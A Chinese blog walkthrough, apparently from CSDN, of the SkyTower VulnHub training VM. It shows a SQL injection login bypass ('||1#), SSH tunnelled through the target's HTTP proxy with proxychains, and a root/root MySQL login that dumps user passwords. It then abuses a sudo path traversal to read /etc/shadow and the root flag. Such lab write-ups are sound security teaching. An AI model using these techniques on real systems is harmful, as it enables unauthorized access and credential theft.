首页 > 其他分享 >SkyTower靶机

SkyTower靶机

时间:2024-07-31 21:25:40浏览次数:15  
标签:proxychains SkyTower .. 192.168 7.61 ssh 靶机 john

靶机地址:SkyTower: 1 ~ VulnHub

一、信息收集

步骤一:将攻击机kali和靶机均设为桥接模式,此时靶机的MAC地址为:

步骤二:确定目标主机

arp-scan -l

得到目标主机IP为192.168.7.61

步骤三:查看开放的端口


nmap -sV -p- 192.168.7.61

步骤四:浏览器访问

步骤五:目录扫描,无有用信息

dirb http://192.168.7.61/

步骤六:返回登录页面,登录时使用burp抓包,并在email处拼接 ',发现返回包出现sql报错

拼接or 1=1 #,发现or、=均被过滤

尝试使用||代替or,拼接'||1#,显示登录成功,并出现一组账号密码:john hereisjohn

二、权限获取

步骤七:得到账号密码,就可以尝试使用ssh连接,但连接失败,因为靶机22端口处于filtered状态,此时只剩下3128端口,这个是一个(http-proxy)代理服务,那么有没有可能是22端口需要经3128端口服务代理之后才能访问;使用代理工具 proxychains进行配置代理,将http流量代理到目标主机的3128端口

vi /etc/proxychains4.conf

步骤八:使用proxychains以及账号密码登录,却发现登录后会立即退出

proxychains ssh john@192.168.7.61

步骤九:尝试在登录的同时执行命令

proxychains ssh john@192.168.7.61 /bin/bash

依次查看到.bashrc文件,发现该文件有一个退出的动作

可以将此文件删除以解决自动退出动作

步骤十:cd到网站目录,查看其配置文件

cd /var/www

查看login.php文件

cat login.php

使用rm命令删除.bashrc文件,删除成功

proxychains ssh john@192.168.7.61 rm .bashrc
proxychains ssh john@192.168.7.61 ls -la

重新尝试使用ssh连接,此时就不存在自动退出的操作

proxychains ssh john@192.168.7.61

连接mysql,连接成功

mysql -uroot -proot

获取MySQL数据库数据,得到三组账号密码

show databases;
use SkyTech;
show tables;
select * from login;

在john用户处输入sudo -l查看可提权的命令,发现没有

sudo切换sara用户却发现无法切换,此时只能退出使用ssh连接,却发现它如同john登录一样,得删除掉.bashrc文件

三、权限提升

proxychains ssh sara@192.168.7.61 ls -la
proxychains ssh sara@192.168.7.61 rm .bashrc
proxychains ssh sara@192.168.7.61

输入id,发现sara用户也是普通用户,再输入sudo -l查看显示允许当前用户使用的命令

发现可以在/accounts/*使用root的cat和ls命令

查看/etc/passwd,可以看到root用户加密的密码,尝试解密,解密失败

sudo cat /accounts/../etc/shadow

sudo /bin/ls /accounts/../../../                #列举根目录下有哪些内容
sudo /bin/ls /accounts/../../../root/           #列举root权限下的flag文件地址
sudo /bin/cat /accounts/../../../root/flag.txt   #读取root权限下的flag文件内容

切换root用户

提权成功!

标签:proxychains,SkyTower,..,192.168,7.61,ssh,靶机,john
From: https://blog.csdn.net/m0_61995767/article/details/140806394

相关文章

  • SKYTOWER: 1超详细靶机实战
    一、安装配置靶机下载地址:https://www.vulnhub.com/entry/skytower-1,96/下载之后解压发现是VirtualBox格式的我们下载一个VirtualBox,这是官网Downloads–OracleVMVirtualBoxhttps://www.virtualbox.org/wiki/Downloads安装到默认路径就行打开后点击注册选择解......
  • 21LTR.com_Scene1_2.120靶机
    getshell主机发现,端口目录扫描只有一个logs目录,接着往下扫访问首页,检查源代码,发现一组账号密码,可能是ssh,也可能是ftp的访问logs接口,没有权限尝试利用发现的账号密码,ssh没有成功,尝试ftp注意在windows上什么没有,用kali连接下载到本地查看一下拼接访问logs目录......
  • Kioptrix靶机
    主机发现,目录扫描发现个phpmyadmin页面,尝试弱口令,发现不行,权限被拒绝登录界面显示网站采用了lotusCMS,去kali的msf上找找有没有可利用的漏洞尝试利用,成功反弹到shell,但是普通用户提权uname-r查看内核版本找对应的payload找带有脏牛的searchsploit-m40839.c......
  • vulhubXXE靶机
    将下载好的靶机导入到VMware中,设置网络模式为NAT模式,然后开启靶机虚拟机使用nmap进行主机发现,获取靶机IP地址nmap192.168.47.1-254kali本机ip根据对比可知XXE的一个ip地址为192.168.134.134,并开放了80端口在浏览器访问http://192.168.134.134对网站进行目录和......
  • hackme,aiweb,tomato靶机解析大礼包
    注:所有靶机均只做到连接木马,并未提权寻找flag,问就是不会o(╥﹏╥)ohackme靶机1.导入靶机,查看其网段,使用端口扫描工具(御剑2014)进行扫描,获取端口后进入2.注册一个账户登录3.随机输入,点击search,抓包,在搜索框后加*,使用sqlmap注入4.获取数据库,表,数据5.......
  • W1R3S靶机
    w1r3s引言近些日子看红笔大佬的靶机精讲视频时,他的一句话让我感受颇深,很多视频在讲解时,直接告诉你应该这么想,不应该那么想,但是其实在我们自己实战中,到底怎么才能辨认出什么信息是有用的?我们不应该是去刻意记忆在某个渗透过程中的特定信息,而是仔细去分析,并在一次次的渗透经历中摸......
  • De-ICE靶机
    getshell主机发现 arp-scan-l端口目录扫描,目录没有扫出来有利信息,查看端口,开放21,22端口,留意一下访问主页http://192.168.1.120/products.php?id=63 id处存在sql注入获取数据库下的账号密码sqlmap-uhttp://192.168.1.120/products.php?id=1-Dmysql--users......
  • 【Vulnhub靶机之Hackme】
     第一步:打开靶机 第二步:查看虚拟靶机ip、第三步:查看连接80端口的ip第四步:扫描出靶机的ip地址第五步:扫描靶机地址下的目录访问login.php目录点击注册点击,可以看到许多的书名 第六步:使用burpsuite抓包在111后面加*号保存抓到的文件为post.txt第七步:使用......
  • 【Vulnhub靶机tomato渗透】
    第一步:端口扫描我使用的是webrobot访问这个ip,就是它了 第二步:目录扫描打开kali使用dirb命令扫描http://192.168.189.154下的目录dirbhttp://192.168.189.154扫描到目录。第三步:访问目录地址看到有几个php的文件第四步:查看访问php的文件我查看的antibot.php是......
  • tomato-靶机渗透
    tomato-靶机一、安装靶机环境下载双击.ova文件,写文件名路径导入打开虚拟机用NAT模式编辑–>虚拟网络编辑器查看IP段二、信息收集1.御剑端口扫描查找该虚拟机的IP访问网站扫目录dirbhttp://192.168.30.130收集到目录/server-status/antibot_image//ind......